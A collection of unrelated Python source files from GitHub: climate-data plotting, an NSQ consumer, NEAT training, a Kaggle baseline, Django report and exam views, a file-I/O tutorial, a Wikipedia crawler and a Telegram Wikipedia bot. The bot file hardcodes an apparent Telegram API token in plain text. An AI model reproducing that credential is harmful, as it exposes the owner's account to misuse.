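\r\n\r\n# Units sanity check for the conversions above (assuming co2eq comes in kt, which is what the /1_000_000 -> Gt step implies):\r\n# 1 kt = 1_000 t = 1_000_000 kg, so 1_000 * kt / persons gives t per person and 1_000_000 * kt / $ gives kg per $.\r\n# E.g. a region with 120_000 kt CO2eq and 10_000_000 people: 1_000 * 120_000 / 10_000_000 == 12.0 t per person.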
\r\n\r\nworld['ghg_per_cap'] = 1_000 * world['co2eq'] / world['pop'] # t CO2eq / capita\r\nworld['ghg_per_gdp'] = 1_000_000 * world['co2eq'] / world['gdp_ppp'] # kg CO2eq / $\r\nworld['gdp_per_cap'] = world['gdp_ppp'] / world['pop']\r\nworld['co2eq'] = world['co2eq'] / 1_000_000 # Gt CO2\r\nworld['gdp_ppp'] = world['gdp_ppp'] / 1_000_000 # million $\r\nworld['pop'] = world['pop'] / 1_000_000_000 # billion\r\nworld['final_region'] = 'Svět'\r\n\r\n\r\ntitles = {\r\n    'ghg_per_cap': 't CO2eq / person',\r\n    'ghg_per_gdp': 'kg CO2eq / $',\r\n    'gdp_per_cap': '$ / person',\r\n    'pop': 'population (billion)',\r\n    'gdp_ppp': 'GDP (million $)',\r\n    'co2eq': 'Gt CO2eq'\r\n}\r\n\r\nplt.rcParams['figure.figsize'] = 12, 7\r\n\r\nfigs = []\r\nfor x in ['ghg_per_cap', 'ghg_per_gdp', 'gdp_per_cap', 'pop', 'gdp_ppp', 'co2eq']:\r\n    fig, ax = plt.subplots()\r\n    sns.lineplot('year_data', x, data=regions, hue='final_region', marker='o')\r\n    ax.set_title(titles[x] + ' (regions)')\r\n    legend = plt.legend()\r\n    legend.get_frame().set_facecolor('none')\r\n    figs.append(fig)\r\n\r\n# Chart(figs, cols=2, title='All regions').show()\r\nall_chart = Chart(figs, cols=2, title='All regions')\r\n\r\n\r\nplt.rcParams['figure.figsize'] = 8, 5\r\nfigs = []\r\nfor x in ['ghg_per_cap', 'ghg_per_gdp', 'gdp_per_cap', 'pop', 'gdp_ppp', 'co2eq']:\r\n    fig, ax = plt.subplots()\r\n    sns.lineplot('year_data', x, data=world, marker='o')\r\n    ax.set_title(titles[x] + ' (world)')\r\n    figs.append(fig)\r\n\r\n# Chart(figs, cols=3, title='World').show()\r\nworld_chart = Chart(figs, cols=3, title='World')\r\n\r\n\r\nplt.rcParams['figure.figsize'] = 8, 5\r\ncharts = []\r\nfor r, rdf in regions.groupby('final_region'):\r\n    figs = []\r\n    for x in ['ghg_per_cap', 'ghg_per_gdp', 'gdp_per_cap', 'pop', 'gdp_ppp', 'co2eq']:\r\n        fig, ax = plt.subplots()\r\n        sns.lineplot('year_data', x, data=rdf, marker='o')\r\n        ax.set_title(titles[x] + f' ({r})')\r\n        figs.append(fig)\r\n    charts.append(Chart(figs, cols=3, title=r))\r\n\r\nregions_chart = Selector(charts, title='Per region')\r\n# regions_chart.show()\r\n\r\nrep = Selector([all_chart, world_chart, regions_chart], 'Emissions intensity (2015 update)')\r\nrep.show()\r\n\r\n\r\n# again, CO2 to 2018 only! 
---\r\n\r\ndata = df[['code', 'year', 'SP.POP.TOTL', 'NY.GDP.MKTP.PP.KD', 'edgar50_co2']] \\\r\n .rename(columns={'year': 'year_data', 'SP.POP.TOTL': 'pop', 'NY.GDP.MKTP.PP.KD': 'gdp_ppp',\r\n 'edgar50_co2': 'co2'})\r\n\r\nvars = ['pop', 'gdp_ppp', 'co2']\r\ndata = data.dropna(subset=vars)\r\n\r\ndata['year_data'] = np.int_(data['year_data'])\r\ncountries = pd.read_csv('D:\\\\projects\\\\fakta-o-klimatu\\\\work\\\\emission-intensity\\\\countries.csv')\r\n\r\nno_years = data.groupby('code')['year_data'].count().rename('count').reset_index()\r\nmax_pop = data.groupby('code')['pop'].max().reset_index()\r\n\r\npop_years = pd.merge(no_years, max_pop)\r\npop_years['pop'].sum() # 7_502_176_200\r\npop_years[pop_years['count'] < 29]['pop'].sum() # 225_276_087\r\npop_years[pop_years['count'] == 29]['pop'].sum() # 7_276_900_113\r\n\r\ncountries = pd.merge(countries, pop_years)\r\n\r\nregions = pd.merge(data, countries[countries['count'] == 29][['code', 'final_region']])\r\n# regions.final_region.drop_duplicates()\r\nregions.loc[regions.final_region == 'Evropská unie', 'final_region'] = 'Evropa'\r\nregions.loc[regions.final_region == 'Spojené státy americké', 'final_region'] = 'Severní Amerika'\r\nworld = regions.drop(columns=['code', 'final_region']).groupby(['year_data']).sum().reset_index()\r\n\r\ncze = regions[regions.code == 'CZE'].copy()\r\ncze['final_region'] = 'Česká republika'\r\nregions = pd.concat([regions, cze])\r\nregions = regions.drop(columns=['code']).groupby(['final_region', 'year_data']).sum().reset_index()\r\n# regions.show()\r\n\r\nregions['ghg_per_cap'] = 1_000 * regions['co2'] / regions['pop'] # t CO2 / capita\r\nregions['ghg_per_gdp'] = 1_000_000 * regions['co2'] / regions['gdp_ppp'] # kg CO2 / $\r\nregions['gdp_per_cap'] = regions['gdp_ppp'] / regions['pop']\r\nregions['co2'] = regions['co2'] / 1_000_000 # Gt CO2\r\nregions['gdp_ppp'] = regions['gdp_ppp'] / 1_000_000\r\nregions['pop'] = regions['pop'] / 1_000_000_000\r\n\r\nworld['ghg_per_cap'] = 1_000 * world['co2'] / world['pop'] # t CO2eq / capita\r\nworld['ghg_per_gdp'] = 1_000_000 * world['co2'] / world['gdp_ppp'] # kg CO2eq / $\r\nworld['gdp_per_cap'] = world['gdp_ppp'] / world['pop']\r\nworld['co2'] = world['co2'] / 1_000_000 # Gt CO2\r\nworld['gdp_ppp'] = world['gdp_ppp'] / 1_000_000 # Gt CO2\r\nworld['pop'] = world['pop'] / 1_000_000_000 # Gt CO2\r\nworld['final_region'] = 'Svět'\r\n\r\n\r\ntitles = {\r\n 'ghg_per_cap': 't CO2 / person',\r\n 'ghg_per_gdp': 'kg CO2 / $',\r\n 'gdp_per_cap': '$ / person',\r\n 'pop': 'population (billion)',\r\n 'gdp_ppp': 'GDP (million $)',\r\n 'co2': 'Gt CO2'\r\n}\r\n\r\nplt.rcParams['figure.figsize'] = 12, 7\r\n\r\nfigs = []\r\nfor x in ['ghg_per_cap', 'ghg_per_gdp', 'gdp_per_cap', 'pop', 'gdp_ppp', 'co2']:\r\n fig, ax = plt.subplots()\r\n sns.lineplot('year_data', x, data=regions, hue='final_region', marker='o')\r\n ax.set_title(titles[x] + ' (regions)')\r\n legend = plt.legend()\r\n legend.get_frame().set_facecolor('none')\r\n figs.append(fig)\r\n\r\n# Chart(figs, cols=2, title='All regions').show()\r\nall_chart = Chart(figs, cols=2, title='All regions')\r\n\r\n\r\nplt.rcParams['figure.figsize'] = 8, 5\r\nfigs = []\r\nfor x in ['ghg_per_cap', 'ghg_per_gdp', 'gdp_per_cap', 'pop', 'gdp_ppp', 'co2']:\r\n fig, ax = plt.subplots()\r\n sns.lineplot('year_data', x, data=world, marker='o')\r\n ax.set_title(titles[x] + ' (world)')\r\n figs.append(fig)\r\n\r\n# Chart(figs, cols=3, title='World').show()\r\nworld_chart = Chart(figs, cols=3, title='World')\r\n\r\n\r\nplt.rcParams['figure.figsize'] 
= 8, 5\r\ncharts = []\r\nfor r, rdf in regions.groupby('final_region'):\r\n figs = []\r\n for x in ['ghg_per_cap', 'ghg_per_gdp', 'gdp_per_cap', 'pop', 'gdp_ppp', 'co2']:\r\n fig, ax = plt.subplots()\r\n sns.lineplot('year_data', x, data=rdf, marker='o')\r\n ax.set_title(titles[x] + f' ({r})')\r\n figs.append(fig)\r\n charts.append(Chart(figs, cols=3, title=r))\r\n\r\nregions_chart = Selector(charts, title='Per region')\r\n# regions_chart.show()\r\n\r\nrep = Selector([all_chart, world_chart, regions_chart], 'Emissions intensity (CO2 only, 2018 update)')\r\nrep.show()\r\n\r\n\r\n\r\n\r\n","repo_name":"protivinsky/python-utils","sub_path":"scripts/2020-02-25_co2-vs-gdp-edgar5.py","file_name":"2020-02-25_co2-vs-gdp-edgar5.py","file_ext":"py","file_size_in_byte":17416,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"73819079201","text":"import gnsq\nimport rdtscp_module\nimport numpy as np\nimport sys\n\n# Variable Initialization\nglobal true_flows\nglobal predicted_flows\nglobal latencies\nglobal messages_processed\n\ntrue_flows = []\npredicted_flows = []\nlatencies = []\nmessages_processed = 0\n\n# NSQ Setup\ntopic = 'nsq-spark-out'\nchannel = 'asdf'\naddress = '192.168.0.120'\nport = '4150'\nreader = gnsq.Reader(topic, channel, address+':'+port, max_in_flight=1000, lookupd_poll_interval=1)\n\n# Experimental values\nburst_size = 200\nmax_received = 20000\n\n@reader.on_message.connect\ndef handler(reader, message):\n # Timestamp right away\n curr_ns = rdtscp_module.rdtscp()\n\n global true_flows\n global predicted_flows\n global latencies\n global messages_processed\n\n data = message.body.decode(\"utf-8\").split(\";\")\n \n predicted_flows.append(data[0])\n true_flows.append(data[1])\n old_ns = int(float(data[2]))\n\n latency = curr_ns - old_ns\n latencies.append(latency)\n\n messages_processed += 1\n\n if messages_processed % burst_size == 0:\n print(messages_processed)\n\n if messages_processed % max_received == 0:\n np.savetxt('latency.txt', np.asarray(latencies), fmt='%d')\n sys.exit(0)\n\nreader.start()\n","repo_name":"BenjaminBush/research","sub_path":"nsq_scripts/consume.py","file_name":"consume.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11448323971","text":"\"\"\"Training script for parallelized NEAT on the basic ruleset.\"\"\"\n\nimport multiprocessing\nimport os\nimport pickle\nfrom typing import Optional\n\nimport neat\n\nfrom basic_neat_model.parallel_utils import evaluate\nfrom basic_neat_model.parallel_utils import ParallelSelfPlayEvaluator\n\n\ndef train(config_file: str,\n generations: Optional[int] = 300,\n checkpoint_file: Optional[str] = None):\n \"\"\"Trains a network using the given configuration. 
Saves the winner.\n\n Args:\n config_file: Path to the configuration from this file's directory.\n generations: The number of generations to train for.\n checkpoint_file: Path to a checkpoint from this file's directory.\n \"\"\"\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_file)\n\n if checkpoint_file is not None:\n pop = neat.Checkpointer.restore_checkpoint(checkpoint_file)\n else:\n pop = neat.Population(config)\n\n pop.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n pop.add_reporter(stats)\n pop.add_reporter(\n neat.Checkpointer(generation_interval=1,\n filename_prefix=\"checkpoints/neat-checkpoint-\"))\n pe = ParallelSelfPlayEvaluator(multiprocessing.cpu_count() - 1, evaluate)\n\n winner = pop.run(pe.evaluate, generations)\n\n with open(\"winner.p\", \"wb\") as file:\n pickle.dump(winner, file)\n\n print(f\"\\nBest genome:\\n{winner}\")\n\n\ndef load_winner(winner_file: str) -> neat.DefaultGenome:\n with open(winner_file, \"rb\") as file:\n winner = pickle.load(file)\n return winner\n\n\nif __name__ == \"__main__\":\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, \"config\")\n train(config_path)\n","repo_name":"ADSteele916/project-lance","sub_path":"basic_neat_model/parallel_model.py","file_name":"parallel_model.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2497857385","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \nimport time\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nfrom subprocess import check_output\nprint(check_output([\"ls\", \"../input\"]).decode(\"utf8\"))\n\nt0 = time.time()\ntrain = pd.read_csv('../input/clicks_train.csv',usecols=['ad_id','clicked'])\n\nprint ('1: ' + str(time.time()-t0))\nt0 = time.time()\n\n\ntest = pd.read_csv('../input/clicks_test.csv')\n\nprint ('2: ' + str(time.time()-t0))\nt0 = time.time()\n\nad_likelihood = train.groupby('ad_id')['clicked'].agg(['count','sum','mean']).reset_index()\n\nprint ('3: ' + str(time.time()-t0))\nt0 = time.time()\n\nmean_clicked = train.clicked.mean()\n\nprint ('4: ' + str(time.time()-t0))\nt0 = time.time()\n\ndel train\nww = 0\nad_likelihood['likelihood'] = (ad_likelihood['sum'] + ww * mean_clicked) / (ad_likelihood['count'] + ww)\n\nprint ('5: ' + str(time.time()-t0))\nt0 = time.time()\n\ntest = test.merge(ad_likelihood,how='left')\n\nprint ('6: ' + str(time.time()-t0))\nt0 = time.time()\n\ntest.fillna(mean_clicked,inplace=True)\n\nprint ('7: ' + str(time.time()-t0))\nt0 = time.time()\n\n\ntest.sort_values(['display_id','likelihood'],inplace=True,ascending=False)\n\nprint ('8: ' + str(time.time()-t0))\nt0 = time.time()\n\noutput=test.groupby(['display_id'])['ad_id'].apply(lambda x:' '.join(map(str,x))).reset_index()\n\nprint ('9: ' + str(time.time()-t0))\nt0 = time.time()\n\noutput.to_csv('output.csv',index=False)\n\nprint ('10: ' + str(time.time()-t0))\nt0 = time.time()","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/outbrain-click-prediction/Behjat/pandas-lb-0-63709.py","file_name":"pandas-lb-0-63709.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"2178659356","text":"from django.shortcuts import render\nfrom .models import EduLevelProgram, Program, DevelopeForm, PriemType, GoogleReport, Status, ExamesTite\nfrom django.http import JsonResponse\nfrom .tasks import make_report_xlsx, make_report_google, register_entrant, write_exames, make_mail_exam\n\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\n# Create your views here.\nfrom django.views.generic import View\nfrom django.core.paginator import Paginator\n\nfrom .google import GoogleConnection, DeleteData\n\n\n\nclass Report(View):\n template_name = 'oopk/report.html'\n\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n self.data = {\n \"success\": True,\n \"errors\": None\n }\n\n self.postData = {}\n \n def get(self, request, *args, **kwargs):\n \n eduLevel = EduLevelProgram.objects.all().order_by(\"name\")\n program = Program.objects.all().order_by(\"code\")\n form = DevelopeForm.objects.all().order_by(\"sort\")\n finance = PriemType.objects.all().order_by(\"name\")\n status = Status.objects.all().order_by(\"name\")\n \n context = {}\n\n context['eduLevel'] = eduLevel\n context['programs'] = program\n context['forms'] = form\n context['typePriem'] = finance\n context['status'] = status\n\n return render(request, self.template_name, context)\n \n def post(self, request, *args, **kwargs):\n \n if request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n\n self.postData = request.POST.dict()\n \n self.postData.update({\"program\":request.POST.getlist(\"program\")})\n self.postData.update({\"form\":request.POST.getlist(\"form\")})\n 
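# request.POST.getlist collects every value submitted under one key (the multi-select\n            # fields); e.g. program=a&program=b arrives as ['a', 'b'], where .get would return only 'b'.\n            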
self.postData.update({\"competitionType\":request.POST.getlist(\"competitionType\")})\n self.postData.update({\"abiturstatus\":request.POST.getlist(\"abiturstatus\")})\n self.postData.update({\"user\":request.user.id})\n \n\n \n if self.postData.get(\"radioReportType\") == \"google\":\n task = make_report_google.delay(self.postData)\n operation_type = \"google\"\n else:\n \n task = make_report_xlsx.delay(self.postData)\n operation_type = \"xlsx\"\n \n \n return JsonResponse({'task_id': task.id, \"operation_type\": operation_type})\n \n\n \n@csrf_exempt\ndef download_report_view(request):\n\n if request.method == 'POST' and request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n \n task_id = request.POST.get('task_id')\n \n\n if request.POST.get(\"operation_type\") == \"xlsx\":\n result = make_report_xlsx.AsyncResult(task_id)\n else:\n result = make_report_google.AsyncResult(task_id)\n\n if result.ready():\n\n result = result.result\n \n if request.POST.get(\"operation_type\") == \"xlsx\":\n \n return JsonResponse({'status': 'SUCCESS', 'file': result, 'file_name': 'report.xlsx'})\n else:\n if result[\"error\"]:\n pass\n else:\n return JsonResponse({'status': 'SUCCESS', 'url': result[\"url\"]})\n else:\n \n return JsonResponse({'status': 'in_progress'})\n else:\n \n return HttpResponse(\"Error: Invalid request method.\")\n\n\n#фильтр для формы запросов\nclass MyAjaxFilterView(View):\n\n def get(self, request, *args, **kwargs):\n\n if request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n # Получение значений выбранных полей формы\n filter_value = request.GET.get('filter_field1')\n \n # Фильтрация данных на основе значений выбранных полей\n filtered_data = Program.objects.filter(eduLevel__name = filter_value)\n # Пример формирования данных для отправки в JSON-формате\n data = {'filtered_data': list(filtered_data.values())}\n\n return JsonResponse(data)\n \n#Вывод данных в отчетную таблицу\nclass ReportTable(View):\n\n template_name = 'oopk/report_table.html'\n\n\n def get(self, request, *args, **kwargs):\n\n report = GoogleReport.objects.select_related(\"user\").order_by(\"-created_time\")\n\n paginator = Paginator(report, 10) # 10 элементов на страницу\n page = request.GET.get('page')\n items = paginator.get_page(page)\n\n context = {}\n\n context['reports'] = items\n\n\n return render(request, self.template_name, context)\n\n#Удаление отчета google\n@csrf_exempt\ndef delete_sheet_view(request):\n\n \n result = {\"success\": True, \"error\": None}\n\n if request.method == 'POST' and request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n\n \n services = GoogleConnection(request.user.pk).build_services()\n \n if services[\"error\"]:\n result.update({\"success\": False,\"error\": services[\"error\"]})\n\n spreadsheet_id = GoogleReport.objects.get(pk = request.POST.get(\"itemId\")).spreadsheet_id\n \n\n delete_result = DeleteData(drive_service = services[\"drive_service\"], spreadsheet_id=spreadsheet_id).delete()\n GoogleReport.objects.get(pk = request.POST.get(\"itemId\")).delete()\n\n \n return JsonResponse(result)\n\n#------------------------------------------\n#Exames\n\nclass ExamRegistration(View):\n template_name = 'oopk/exam_registration.html'\n\n def __init__(self, **kwargs) -> None:\n super().__init__(**kwargs)\n self.data = {\n \"success\": True,\n \"errors\": None\n }\n\n self.postData = {}\n \n def get(self, request, *args, **kwargs):\n \n\n return render(request, self.template_name) \n \n def post(self, request, *args, **kwargs):\n\n self.postData = 
\n@csrf_exempt\ndef download_reg_file_view(request):\n\n    if request.method == 'POST' and request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n        \n        task_id = request.POST.get('task_id')\n        \n        result = register_entrant.AsyncResult(task_id)\n        \n        if result.ready():\n\n            result = result.result\n            \n            return JsonResponse({'status': 'SUCCESS', 'file': result[\"file\"], 'file_name': result[\"file_name\"], 'type': result[\"type\"] } )\n        \n        else:\n            \n            return JsonResponse({'status': 'in_progress'})\n    else:\n        \n        return HttpResponse(\"Error: Invalid request method.\")\n\nclass ExamWrite(View):\n    template_name = 'oopk/exam_write.html'\n\n    def __init__(self, **kwargs) -> None:\n        super().__init__(**kwargs)\n        self.data = {\n            \"success\": True,\n            \"errors\": None\n        }\n\n        self.postData = {}\n    \n    def get(self, request, *args, **kwargs):\n\n        eduLevel = ExamesTite.objects.select_related('edulevel').values_list('edulevel__name', flat=True).distinct()\n        exames_title = ExamesTite.objects.values_list('name', flat=True).order_by(\"name\")\n        \n        \n        context = {}\n\n        context['eduLevel'] = eduLevel\n        context[\"exames\"] = exames_title\n        \n\n        return render(request, self.template_name, context) \n    \n    def post(self, request, *args, **kwargs):\n\n        self.postData = request.POST.dict()\n\n        self.postData.update({\"exam\":request.POST.getlist(\"exam\")})\n\n        task = write_exames.delay(self.postData)\n        \n        return JsonResponse({'task_id': task.id})\n    \n\n# filter for writing exams\nclass ExameAjaxFilterView(View):\n\n    def get(self, request, *args, **kwargs):\n\n        if request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n            # Get the values of the selected form fields\n            group = True if request.GET.get('group') == \"Да\" else False # 'Да' = 'Yes' (the value sent by the form)\n            \n            eduLevel = request.GET.get('eduLevel')\n            \n            # Filter the data based on the selected field values\n            filtered_data = ExamesTite.objects.select_related(\"edulevel\").filter(edulevel__name = eduLevel, group = group)\n            \n            # Build the data to send back in JSON format\n            data = {'filtered_data': list(filtered_data.values())}\n\n            return JsonResponse(data)\n        \n@csrf_exempt\ndef download_write_file_view(request):\n\n    if request.method == 'POST' and request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n        \n        task_id = request.POST.get('task_id')\n        \n        result = write_exames.AsyncResult(task_id)\n        \n        if result.ready():\n\n            result = result.result\n            \n            return JsonResponse({'status': 'SUCCESS', 'file': result[\"file\"], 'file_name': result[\"file_name\"], 'type': result[\"type\"] } )\n        \n        else:\n            \n            return JsonResponse({'status': 'in_progress'})\n    else:\n        \n        return HttpResponse(\"Error: Invalid request method.\")\n\n\nclass ExamMail(View):\n    template_name = 'oopk/exam_mail.html'\n\n    def __init__(self, **kwargs) -> None:\n        super().__init__(**kwargs)\n        self.data = {\n            \"success\": True,\n            \"errors\": None\n        }\n\n        self.postData = {}\n    \n    def get(self, request, *args, **kwargs):\n        \n\n        return render(request, self.template_name) \n    \n    def post(self, request, *args, **kwargs):\n\n        self.postData = request.POST.dict()\n\n        task = make_mail_exam.delay(self.postData)\n        \n        return JsonResponse({'task_id': task.id})\n    \n\n@csrf_exempt\ndef download_mail_file_view(request):\n\n    if request.method == 'POST' and request.META.get('HTTP_X_REQUESTED_WITH') == 'XMLHttpRequest':\n        \n        task_id = request.POST.get('task_id')\n        \n        result = make_mail_exam.AsyncResult(task_id)\n        \n        if 
result.ready():\n\n            result = result.result\n            \n            return JsonResponse({'status': 'SUCCESS', 'file': result[\"file\"], 'file_name': result[\"file_name\"], 'type': result[\"type\"] } )\n        \n        else:\n            \n            return JsonResponse({'status': 'in_progress'})\n    else:\n        \n        return HttpResponse(\"Error: Invalid request method.\")","repo_name":"hyxp3r/paosystem_new","sub_path":"oopk/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"16450142318","text":"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n    url(r'^search/$', views.search, name='search'),\n    url(r'^reservate/', views.reservate_calendar),\n    url(r'^(?P<room_id>[0-9]+)/booking/(?P<book_id>[0-9]+)/delete/$', views.delete_calendar)\n]\n\n","repo_name":"mustakadem/project-2DAW","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"1944158605","text":"# I think most people know the virtues a programmer is said to have. Of course, there are three: laziness, impatience, and hubris.\n# Bad software written by one person will give another person a full-time job.\n# Keep up the momentum: preparing for the graduate entrance exam is a test of endurance!!!\n'''\nread([size]): read size bytes/characters from the file and return them; if [size] is omitted, read to the end of the file, i.e. read the whole file at once\nreadline(): read one line from a text file\nreadlines(): treat each line of the text file as a separate string object and return these objects in a list\nwrite(str): write the string str to the file\nwritelines(s_list): write the list of strings s_list to the text file, without adding newlines\nseek(offset[,whence]): move the file pointer to a new position; offset is relative to whence:\n    offset: positive moves toward the end, negative toward the beginning\n    the values of whence have different meanings:\n        0: counted from the start of the file (default)\n        1: counted from the current position\n        2: counted from the end of the file\ntell(): return the current position of the file pointer\nflush(): write the buffer contents to the file, but do not close the file\nclose(): write the buffer contents to the file, close the file, and release the file object\n'''\n\n# read\nfile=open('c.txt','r')\nprint(file.read(2)) # read two characters, i.e. “中国”\nprint(file.readline()) # read one line from the text file\nprint(file.readlines()) # each line as a separate string object, returned in a list\nfile.close()\n\n# write\nfile=open('d.txt','a')\nfile.write('hello')\nlst=['java','go','c++','c']\nfile.writelines(lst)\nfile.close()\n\n\n# file pointer -- seek\nfile=open('c.txt','r')\nfile.seek(2) # skip 2 bytes; one Chinese character is 2 bytes here, so “中” is skipped and reading starts from “国”\nprint(file.read())\nfile.close()\n\n\n# return the current position of the file pointer -- tell\nfile=open('d.txt','r')\nprint(file.read())\nprint(file.tell())\nfile.close()\n\n\n# write the buffer contents to the file without closing it -- flush\nfile=open('e.txt','a')\nfile.write('hello')\nfile.flush()\nfile.write('world')\nfile.close()","repo_name":"FelixG520/Python","sub_path":"python基础/15.第十五章(文件处理)/4.文件对象的常用方法/文件对象的常用方法.py","file_name":"文件对象的常用方法.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"25422884799","text":"import bs4\nimport requests\nfrom download_pages import start_save_process, get_tags\nimport traceback\n\nroot_url = \"https://en.wikipedia.org/wiki/Category:Lists_of_people_in_STEM_fields\"\nbase_url = \"https://en.wikipedia.org\"\n\n# Might remove in favor of having this redundancy filtering done at download\nhave_visited = dict()\n\npages_to_ignore = []\n\nheadings_to_ignore = [\"Editing:\", \"Portal:\", \"Wikipedia:\", \"Talk:\", \"File:\", \"Template:\"]\n\n\ndef descend(page, level: int, is_redirect=False):\n    try:\n        if level >= 4:\n            return\n        if page is not None:\n            heading = page.find(id=\"firstHeading\")\n            heading_text = heading.text\n            if heading_text in pages_to_ignore:\n                return\n            elif page in have_visited.keys():\n                return\n            elif [element for element in headings_to_ignore if (element in heading_text)]:\n                return\n            else:\n                print(\"\\n|\", 2 * level * \"—\", heading_text, sep=\"\", end=\"\")\n                if \"Category\" in heading_text:\n                    handle_category(page, level + 1)\n                elif \"Lists of\" in heading_text and not is_redirect:\n                    handle_lists(page, level + 1)\n                elif \"List of\" in heading_text and not is_redirect:\n                    handle_list(page, level + 1)\n                else:\n                    handle_ambiguous_page(page, level + 1)\n\n    except Exception as e:\n        print(\"\")\n        print(e)\n\n
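# Note: have_visited is keyed by the parsed BeautifulSoup object, and get_bs4_page builds a\n# fresh object per call, so keying by URL would deduplicate more reliably. A sketch of that\n# variant (hypothetical names, not part of the original script):\n#\n#   visited_urls = set()\n#\n#   def descend_url(url, level):\n#       if url in visited_urls:\n#           return\n#       visited_urls.add(url)\n#       descend(get_bs4_page(url), level)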
\n\n\ndef handle_ambiguous_page(page, level):\n    biography_infobox = page.find(class_=\"infobox biography vcard\")\n\n    if biography_infobox is not None or prob_is_a_person(page):\n        have_visited[page] = True\n        start_save_process(page)\n        print(\": Saved\", end=\"\")\n        return\n\n\ndef prob_is_a_person(page):\n    tags = get_tags(page)\n    str_tags = \" \".join(tags)\n    personhood_markers = [\"living \", \" births\", \" deaths\"]\n    for marker in personhood_markers:\n        if marker in str_tags.lower():\n            return True\n    return False\n\n\ndef handle_category(page, level: int):\n    sub_pages = page.find(id=\"mw-pages\")\n    list_items = sub_pages.find_all(\"li\")\n    for item in list_items:\n        have_visited[page] = True\n        link = item.find(\"a\")\n        url = base_url + link[\"href\"]\n        descend(get_bs4_page(url), level)\n\n\ndef handle_lists(page, level: int):\n    content = page.find(class_=\"mw-parser-output\")\n    list_items = content.find_all(\"li\")\n    for list_item in list_items:\n        have_visited[page] = True\n        link = list_item.find(\"a\")\n        url = base_url + link[\"href\"]\n        descend(get_bs4_page(url), level)\n\n\ndef handle_list(page, level: int):\n    content = page.find(class_=\"mw-parser-output\")\n    if content is None:\n        return\n    link_to_pages = content.find_all(\"a\")\n    for link in link_to_pages:\n        href = link[\"href\"]\n        is_redirect = False\n        if link.has_attr(\"class\"):\n            is_redirect = (\"mw-redirect\" in link[\"class\"])\n        if (\"#\" not in href) and (link.text != \"link\") and (\"List of\" not in link.text) \\\n                and (\"Lists of\" not in link.text) and (\"Category\" not in link.text):\n            have_visited[page] = True\n            descend(get_bs4_page(base_url + href), level, is_redirect)\n\n\ndef get_bs4_page(url: str):\n    if \"/wiki/\" not in url:\n        return None\n    response = requests.get(url)\n    return bs4.BeautifulSoup(response.text, \"html.parser\")\n\n\nif __name__ == '__main__':\n    descend(get_bs4_page(root_url), 0)\n","repo_name":"Madrugaur/backbone","sub_path":"code/python/scripts/wiki_crawler.py","file_name":"wiki_crawler.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
{"seq_id":"26421251398","text":"import logging\r\nimport wikipedia\r\nfrom aiogram import Bot, Dispatcher, executor, types\r\n\r\nAPI_TOKEN = '5203534164:AAFHs3QkFr_szIXaeHe0PYKg-FtL5LwHYlY'\r\nwikipedia.set_lang('uz')\r\n# Configure logging\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\n# Initialize bot and dispatcher\r\nbot = Bot(token=API_TOKEN)\r\ndp = Dispatcher(bot)\r\n\r\n@dp.message_handler(commands=['start'])\r\nasync def send_welcome(message: types.Message):\r\n    \"\"\"\r\n    This handler will be called when user sends `/start` or `/help` command\r\n    \"\"\"\r\n    await message.reply(\"Hello, I help you find articles from Wikipedia\")\r\n\r\n@dp.message_handler(commands=['help'])\r\nasync def send_help(message: types.Message):\r\n    \"\"\"\r\n    This handler will be called when user sends `/start` or `/help` command\r\n    \"\"\"\r\n    await message.reply(\"To use me, send a word related to the article you are looking for!\")\r\n\r\n\r\n@dp.message_handler()\r\nasync def wikiyubor(message: types.Message):\r\n    try:\r\n        respond = wikipedia.summary(message.text)\r\n        await message.answer(respond)\r\n    except:\r\n        await message.reply('No information found')\r\n
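\r\n    # The bare except above swallows every error; the wikipedia package raises specific\r\n    # exceptions that could be handled separately (a sketch, assuming the standard wikipedia lib):\r\n    #\r\n    #   except wikipedia.exceptions.DisambiguationError as e:\r\n    #       await message.reply('Ambiguous query, options: ' + ', '.join(e.options[:5]))\r\n    #   except wikipedia.exceptions.PageError:\r\n    #       await message.reply('No matching page found')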
